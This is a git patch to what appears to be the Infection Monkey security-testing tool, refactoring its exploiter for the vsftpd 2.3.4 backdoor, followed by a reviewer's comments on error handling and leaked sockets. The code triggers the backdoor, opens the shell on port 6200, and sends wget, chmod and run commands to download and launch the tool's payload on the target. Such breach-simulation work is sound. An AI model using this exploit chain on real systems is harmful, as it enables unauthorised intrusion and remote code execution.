From 9e5292dc8e87ee55130a6ca9eaac5a18ea2edf1d Mon Sep 17 00:00:00 2001
From: Dhayalan
Date: Thu, 18 Apr 2019 20:48:24 +0200
Subject: [PATCH] Update vsftpd.py implemented 3 functions socket_connect, socket_send,socket_send_recv to handle the exception as advised.
---
monkey/infection_monkey/exploit/vsftpd.py | 190 +++++++++++++---------
1 file changed, 116 insertions(+), 74 deletions(-)
diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
index bf36adfe0..c4db287dc 100644
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@@ -30,92 +30,134 @@ class VSFTPDExploiter(HostExploiter): super(VSFTPDExploiter, self).__init__(host) self.skip_exist = self._config.skip_exploit_if_file_exist - def exploit_host(self): + def socket_connect(s,ip_addr,port): try: - LOG.info('Attempting to trigger backdoor...') - ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ftp_socket.connect((self.host.ip_addr, FTP_PORT)) - ftp_socket.recv(128).decode('utf-8') - # Attempt to login to trigger backdoor - ftp_socket.send(USERNAME) - ftp_socket.recv(128).decode('utf-8') - ftp_socket.send(PASSWORD) - ftp_socket.recv(128).decode('utf-8') - ftp_socket.close() - LOG.info('Triggered backdoor') - + s.connect((ip_addr,port)) + return True except socket.error as e: - LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr) + LOG.error('Failed to connect to %s' , self.host.ip_addr) + + return False + def socket_send_recv(s,message): try: - LOG.info('Attempting to connect to backdoor...') - backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - backdoor_socket.connect((self.host.ip_addr, 6200)) + s.send(message) + return s.recv(128).decode('utf-8') + + except socket.error as e: + LOG.error('Failed to send payload to %s' , self.host.ip_addr) + + return False + + def socket_send(s,message): + try: + s.send(message) + return True + + except socket.error as e: + LOG.error('Failed to send payload to %s' , self.host.ip_addr) + + return False + + + + def exploit_host(self): + + LOG.info('Attempting to trigger backdoor...') + ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT): + ftp_socket.recv(128).decode('utf-8') + + # Attempt to login to trigger backdoor + + if socket_send_recv(ftp_socket,USERNAME): + if socket_send_recv(ftp_socket,PASSWORD): + ftp_socket.close() + LOG.info('Triggered backdoor') + else: + LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr) + return False + else: + LOG.error('Failed to 
trigger backdoor on %s' , self.host.ip_addr) + return False + + LOG.info('Attempting to connect to backdoor...') + backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + if socket_connect(backdoor_socket,self.host.ip_addr, 6200): LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) - command = str.encode("uname -m" + '\n') - backdoor_socket.send(command) - response = backdoor_socket.recv(128).decode('utf-8') + command = str.encode("uname -m" + '\n') + + response = socket_send_recv(backdoor_socket,command) + if response: LOG.info('Response for uname -m: %s', response) if '' != response.lower().strip(): - #command execution is successful + # command execution is successful self.host.os['machine'] = response.lower().strip() self.host.os['type'] = 'linux' + else : + LOG.info("Failed to execute command uname -m on victim %r ",self.host) - else : - LOG.info("Failed to execute command uname -m on victim %r ",self.host) + src_path = get_target_monkey(self.host) + LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path) - src_path = get_target_monkey(self.host) - LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path) - - if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", self.host) - return False - - - LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) - - #copy the monkey into the machine - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) - dropper_target_path_linux = self._config.dropper_target_path_linux - LOG.info("Download link for monkey is %s",http_path) - - #download the monkey - download_command = '/usr/bin/wget %s -O %s;' % ( - http_path, dropper_target_path_linux) - LOG.info("Download_command is %s",download_command) - - command = str.encode(str(download_command) + '\n') - backdoor_socket.send(command) - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - #changeit to executable - - execute_command 
= "/bin/chmod +x %s" % dropper_target_path_linux - LOG.info("Execute_command is %s",execute_command) - - command = str.encode(str(execute_command) + '\n') - - backdoor_socket.send(command) - - - #run the monkey - cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) - cmdline += "&" - - command = str.encode(str(cmdline) + '\n') - backdoor_socket.send(command) - - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) - - self._exploit_info['Vulnerability'] = {"Success":"True"} - - except socket.error as e: - LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr) - LOG.error('Error Connecting to backdoor. Error: %s' % e) + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", self.host) return False + + # copy the monkey into the machine + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) + dropper_target_path_linux = self._config.dropper_target_path_linux + LOG.info("Download link for monkey is %s",http_path) + + # download the monkey + download_command = '/usr/bin/wget %s -O %s;' % ( + http_path, dropper_target_path_linux) + LOG.info("Download_command is %s",download_command) + + download_command = str.encode(str(download_command) + '\n') + + if socket_send(backdoor_socket,download_command): + LOG.info('Monkey is now Downloaded ') + else: + LOG.error('Failed to download monkey at %s' , self.host.ip_addr) + return False + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + + # changeit to executable + + Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux + LOG.info("Change_exec_permission is %s",Change_exec_permission) + + Change_exec_permission = str.encode(str(Change_exec_permission) + '\n') + + if socket_send(backdoor_socket,Change_exec_permission): + LOG.info('Monkey can now be executed ') + else: + 
LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr) + return False + + + # run the monkey + cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) + cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + cmdline += "&" + + run_monkey = str.encode(str(cmdline) + '\n') + if socket_send(backdoor_socket,run_monkey): + LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, self.host, cmdline) + else: + LOG.error('Monkey failed to run at %s' , self.host.ip_addr) + return False + + + self._exploit_info['Vulnerability'] = {"Success":"True"} + + return True
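Review bot: The three new helpers `socket_connect`, `socket_send_recv` and `socket_send` take no `self` yet log `self.host.ip_addr` in their `except socket.error` branches, so the first connection or send failure raises NameError instead of returning False; the captured `e` is also never logged. Either pass the address in and log it (`LOG.error('Failed to connect to %s: %s', ip_addr, e)`) or declare them as methods (`def socket_connect(self, s, ip_addr, port):`) and call them as `self.socket_connect(...)`. Indentation is lost in this view, but if the helpers sit inside `VSFTPDExploiter`, whose definition starts outside the hunk, the bare calls in `exploit_host` would not resolve either. Separately, the early `return False` after a failed download send skips `http_thread.join(DOWNLOAD_TIMEOUT)` and `http_thread.stop()`, and neither `ftp_socket` on its failure branches nor `backdoor_socket` is ever closed. Wrapping each socket in `try`/`finally` or `contextlib.closing`, and stopping the transfer thread in a `finally`, would keep a failed run from leaking descriptors and the HTTP server thread.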